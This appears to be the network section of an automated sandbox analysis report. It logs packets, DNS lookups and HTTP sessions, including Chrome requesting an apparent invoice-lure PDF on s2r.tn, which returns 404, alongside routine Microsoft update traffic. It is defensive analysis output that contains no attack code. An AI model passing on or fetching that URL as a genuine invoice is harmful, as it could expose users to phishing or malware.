                                                  May 23, 2024 21:01:13.471297026 CEST443497172.18.97.153192.168.2.9
                                                  May 23, 2024 21:01:13.516096115 CEST49717443192.168.2.92.18.97.153
                                                  May 23, 2024 21:01:13.553072929 CEST49717443192.168.2.92.18.97.153
                                                  May 23, 2024 21:01:13.594501019 CEST443497172.18.97.153192.168.2.9
                                                  May 23, 2024 21:01:13.795617104 CEST443497172.18.97.153192.168.2.9
                                                  May 23, 2024 21:01:13.795778036 CEST443497172.18.97.153192.168.2.9
                                                  May 23, 2024 21:01:13.795852900 CEST49717443192.168.2.92.18.97.153
                                                  May 23, 2024 21:01:13.795907021 CEST49717443192.168.2.92.18.97.153
                                                  May 23, 2024 21:01:13.795926094 CEST443497172.18.97.153192.168.2.9
                                                  May 23, 2024 21:01:13.795936108 CEST49717443192.168.2.92.18.97.153
                                                  May 23, 2024 21:01:13.795941114 CEST443497172.18.97.153192.168.2.9
                                                  May 23, 2024 21:01:13.827641964 CEST49718443192.168.2.92.18.97.153
                                                  May 23, 2024 21:01:13.827692986 CEST443497182.18.97.153192.168.2.9
                                                  May 23, 2024 21:01:13.827769041 CEST49718443192.168.2.92.18.97.153
                                                  May 23, 2024 21:01:13.828098059 CEST49718443192.168.2.92.18.97.153
                                                  May 23, 2024 21:01:13.828118086 CEST443497182.18.97.153192.168.2.9
                                                  May 23, 2024 21:01:13.982515097 CEST49673443192.168.2.9204.79.197.203
                                                  May 23, 2024 21:01:14.498776913 CEST443497182.18.97.153192.168.2.9
                                                  May 23, 2024 21:01:14.498872995 CEST49718443192.168.2.92.18.97.153
                                                  May 23, 2024 21:01:14.500123978 CEST49718443192.168.2.92.18.97.153
                                                  May 23, 2024 21:01:14.500134945 CEST443497182.18.97.153192.168.2.9
                                                  May 23, 2024 21:01:14.500403881 CEST443497182.18.97.153192.168.2.9
                                                  May 23, 2024 21:01:14.501364946 CEST49718443192.168.2.92.18.97.153
                                                  May 23, 2024 21:01:14.542501926 CEST443497182.18.97.153192.168.2.9
                                                  May 23, 2024 21:01:15.045594931 CEST443497182.18.97.153192.168.2.9
                                                  May 23, 2024 21:01:15.045669079 CEST443497182.18.97.153192.168.2.9
                                                  May 23, 2024 21:01:15.046094894 CEST49718443192.168.2.92.18.97.153
                                                  May 23, 2024 21:01:15.046679020 CEST49718443192.168.2.92.18.97.153
                                                  May 23, 2024 21:01:15.046698093 CEST443497182.18.97.153192.168.2.9
                                                  May 23, 2024 21:01:15.046708107 CEST49718443192.168.2.92.18.97.153
                                                  May 23, 2024 21:01:15.046714067 CEST443497182.18.97.153192.168.2.9
                                                  May 23, 2024 21:01:15.051994085 CEST4434970423.206.229.209192.168.2.9
                                                  May 23, 2024 21:01:15.052150965 CEST49704443192.168.2.923.206.229.209
                                                  May 23, 2024 21:01:22.397284031 CEST49677443192.168.2.920.189.173.11
                                                  May 23, 2024 21:01:22.928261042 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:01:22.928329945 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:01:22.928380966 CEST49716443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:01:23.324342012 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:01:23.324383974 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:01:23.324481010 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:01:23.325560093 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:01:23.325572968 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:01:24.174199104 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:01:24.178164005 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:01:24.178164005 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:01:24.178184032 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:01:24.178455114 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:01:24.222168922 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:01:24.264657974 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:01:24.306493998 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:01:24.555321932 CEST49716443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:01:24.555350065 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:01:24.810472012 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:01:24.810535908 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:01:24.810549974 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:01:24.810566902 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:01:24.810591936 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:01:24.810600996 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:01:24.810614109 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:01:24.810642004 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:01:24.810664892 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:01:24.828401089 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:01:24.828478098 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:01:24.828484058 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:01:24.828511000 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:01:24.828550100 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:01:24.857116938 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:01:24.857135057 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:01:24.857151985 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:01:24.857158899 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:01:25.446162939 CEST49704443192.168.2.923.206.229.209
                                                  May 23, 2024 21:01:25.446268082 CEST49704443192.168.2.923.206.229.209
                                                  May 23, 2024 21:01:25.446727991 CEST49721443192.168.2.923.206.229.209
                                                  May 23, 2024 21:01:25.446774960 CEST4434972123.206.229.209192.168.2.9
                                                  May 23, 2024 21:01:25.446847916 CEST49721443192.168.2.923.206.229.209
                                                  May 23, 2024 21:01:25.450189114 CEST49721443192.168.2.923.206.229.209
                                                  May 23, 2024 21:01:25.450206995 CEST4434972123.206.229.209192.168.2.9
                                                  May 23, 2024 21:01:25.451265097 CEST4434970423.206.229.209192.168.2.9
                                                  May 23, 2024 21:01:25.459512949 CEST4434970423.206.229.209192.168.2.9
                                                  May 23, 2024 21:01:26.110435963 CEST4434972123.206.229.209192.168.2.9
                                                  May 23, 2024 21:01:26.110574961 CEST49721443192.168.2.923.206.229.209
                                                  May 23, 2024 21:01:45.315433979 CEST4434972123.206.229.209192.168.2.9
                                                  May 23, 2024 21:01:45.315618038 CEST49721443192.168.2.923.206.229.209
                                                  May 23, 2024 21:02:02.167500973 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:02:02.167535067 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:02:02.167623997 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:02:02.168098927 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:02:02.168107986 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:02:03.078166008 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:02:03.078474998 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:02:03.079632998 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:02:03.079669952 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:02:03.080554008 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:02:03.082436085 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:02:03.126497984 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:02:03.428735018 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:02:03.428821087 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:02:03.428865910 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:02:03.428910017 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:02:03.428939104 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:02:03.428980112 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:02:03.429002047 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:02:03.448071003 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:02:03.448165894 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:02:03.448210001 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:02:03.448237896 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:02:03.448293924 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:02:03.448316097 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:02:03.448376894 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:02:03.448515892 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:02:03.448561907 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:02:03.448599100 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:02:03.448613882 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:02:12.427062035 CEST49724443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:02:12.427095890 CEST44349724142.250.181.228192.168.2.9
                                                  May 23, 2024 21:02:12.427151918 CEST49724443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:02:12.427375078 CEST49724443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:02:12.427386045 CEST44349724142.250.181.228192.168.2.9
                                                  May 23, 2024 21:02:13.107605934 CEST44349724142.250.181.228192.168.2.9
                                                  May 23, 2024 21:02:13.107990980 CEST49724443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:02:13.108011007 CEST44349724142.250.181.228192.168.2.9
                                                  May 23, 2024 21:02:13.109111071 CEST44349724142.250.181.228192.168.2.9
                                                  May 23, 2024 21:02:13.109414101 CEST49724443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:02:13.109585047 CEST44349724142.250.181.228192.168.2.9
                                                  May 23, 2024 21:02:13.160111904 CEST49724443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:02:23.008671999 CEST44349724142.250.181.228192.168.2.9
                                                  May 23, 2024 21:02:23.008754969 CEST44349724142.250.181.228192.168.2.9
                                                  May 23, 2024 21:02:23.008825064 CEST49724443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:02:24.525897026 CEST49724443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:02:24.525935888 CEST44349724142.250.181.228192.168.2.9
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  May 23, 2024 21:01:07.757725954 CEST4973853192.168.2.91.1.1.1
                                                  May 23, 2024 21:01:07.758001089 CEST6412853192.168.2.91.1.1.1
                                                  May 23, 2024 21:01:07.780347109 CEST53551961.1.1.1192.168.2.9
                                                  May 23, 2024 21:01:07.936564922 CEST53561421.1.1.1192.168.2.9
                                                  May 23, 2024 21:01:08.082917929 CEST53497381.1.1.1192.168.2.9
                                                  May 23, 2024 21:01:09.091367006 CEST53542991.1.1.1192.168.2.9
                                                  May 23, 2024 21:01:10.812860966 CEST53641281.1.1.1192.168.2.9
                                                  May 23, 2024 21:01:12.364542961 CEST5980453192.168.2.91.1.1.1
                                                  May 23, 2024 21:01:12.364542961 CEST6044453192.168.2.91.1.1.1
                                                  May 23, 2024 21:01:12.372247934 CEST53598041.1.1.1192.168.2.9
                                                  May 23, 2024 21:01:12.382225990 CEST53604441.1.1.1192.168.2.9
                                                  May 23, 2024 21:01:27.432522058 CEST53498381.1.1.1192.168.2.9
                                                  May 23, 2024 21:01:46.427877903 CEST53636611.1.1.1192.168.2.9
                                                  May 23, 2024 21:02:02.874186993 CEST138138192.168.2.9192.168.2.255
                                                  May 23, 2024 21:02:07.644851923 CEST53626831.1.1.1192.168.2.9
                                                  May 23, 2024 21:02:10.050950050 CEST53642231.1.1.1192.168.2.9
                                                  May 23, 2024 21:02:35.396644115 CEST53505731.1.1.1192.168.2.9
                                                  TimestampSource IPDest IPChecksumCodeType
                                                  May 23, 2024 21:01:07.943911076 CEST192.168.2.91.1.1.1c238(Port unreachable)Destination Unreachable
                                                  May 23, 2024 21:01:10.812983990 CEST192.168.2.91.1.1.1c220(Port unreachable)Destination Unreachable
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  May 23, 2024 21:01:07.757725954 CEST192.168.2.91.1.1.10xd8dbStandard query (0)s2r.tnA (IP address)IN (0x0001)false
                                                  May 23, 2024 21:01:07.758001089 CEST192.168.2.91.1.1.10xc7feStandard query (0)s2r.tn65IN (0x0001)false
                                                  May 23, 2024 21:01:12.364542961 CEST192.168.2.91.1.1.10x4d0eStandard query (0)www.google.com65IN (0x0001)false
                                                  May 23, 2024 21:01:12.364542961 CEST192.168.2.91.1.1.10x556cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  May 23, 2024 21:01:08.082917929 CEST1.1.1.1192.168.2.90xd8dbNo error (0)s2r.tn70.38.21.234A (IP address)IN (0x0001)false
                                                  May 23, 2024 21:01:12.372247934 CEST1.1.1.1192.168.2.90x4d0eNo error (0)www.google.com65IN (0x0001)false
                                                  May 23, 2024 21:01:12.382225990 CEST1.1.1.1192.168.2.90x556cNo error (0)www.google.com142.250.181.228A (IP address)IN (0x0001)false
                                                  • s2r.tn
                                                  • https:
                                                  • fs.microsoft.com
                                                  • slscr.update.microsoft.com
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.94970970.38.21.2344437836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:01:08 UTC669OUTGET /cgi/INVOICERVSHA.pdf HTTP/1.1
                                                  Host: s2r.tn
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  sec-ch-ua-platform: "Windows"
                                                  Upgrade-Insecure-Requests: 1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: navigate
                                                  Sec-Fetch-User: ?1
                                                  Sec-Fetch-Dest: document
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-05-23 19:01:08 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 23 May 2024 19:01:08 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-05-23 19:01:08 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.94971270.38.21.2344437836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:01:09 UTC588OUTGET /favicon.ico HTTP/1.1
                                                  Host: s2r.tn
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://s2r.tn/cgi/INVOICERVSHA.pdf
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-05-23 19:01:09 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 23 May 2024 19:01:09 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-05-23 19:01:09 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.94971470.38.21.2344437836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:01:09 UTC341OUTGET /cgi/INVOICERVSHA.pdf HTTP/1.1
                                                  Host: s2r.tn
                                                  Connection: keep-alive
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: navigate
                                                  Sec-Fetch-Dest: empty
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-05-23 19:01:09 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 23 May 2024 19:01:09 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-05-23 19:01:09 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.9497172.18.97.153443
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:01:13 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  Accept-Encoding: identity
                                                  User-Agent: Microsoft BITS/7.8
                                                  Host: fs.microsoft.com
                                                  2024-05-23 19:01:13 UTC467INHTTP/1.1 200 OK
                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                  Content-Type: application/octet-stream
                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                  Server: ECAcc (lpl/EF06)
                                                  X-CID: 11
                                                  X-Ms-ApiVersion: Distribute 1.2
                                                  X-Ms-Region: prod-eus-z1
                                                  Cache-Control: public, max-age=248969
                                                  Date: Thu, 23 May 2024 19:01:13 GMT
                                                  Connection: close
                                                  X-CID: 2


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.9497182.18.97.153443
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:01:14 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  Accept-Encoding: identity
                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                  Range: bytes=0-2147483646
                                                  User-Agent: Microsoft BITS/7.8
                                                  Host: fs.microsoft.com
                                                  2024-05-23 19:01:15 UTC535INHTTP/1.1 200 OK
                                                  Content-Type: application/octet-stream
                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                  ApiVersion: Distribute 1.1
                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                  X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                  Cache-Control: public, max-age=248826
                                                  Date: Thu, 23 May 2024 19:01:14 GMT
                                                  Content-Length: 55
                                                  Connection: close
                                                  X-CID: 2
                                                  2024-05-23 19:01:15 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.94971920.114.59.183443
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:01:24 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Uu+pS29dvbTrwRR&MD=+DkuFvsk HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                  Host: slscr.update.microsoft.com
                                                  2024-05-23 19:01:24 UTC560INHTTP/1.1 200 OK
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Content-Type: application/octet-stream
                                                  Expires: -1
                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                  ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                  MS-CorrelationId: c0d836ea-3b43-40b4-9a26-210448c7d631
                                                  MS-RequestId: 00126941-001e-4b47-920c-38b442473442
                                                  MS-CV: v21XsBg/HESf96qo.0
                                                  X-Microsoft-SLSClientCache: 2880
                                                  Content-Disposition: attachment; filename=environment.cab
                                                  X-Content-Type-Options: nosniff
                                                  Date: Thu, 23 May 2024 19:01:24 GMT
                                                  Connection: close
                                                  Content-Length: 24490
                                                  2024-05-23 19:01:24 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                  Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                  2024-05-23 19:01:24 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                  Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.94972220.114.59.183443
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:02:03 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Uu+pS29dvbTrwRR&MD=+DkuFvsk HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
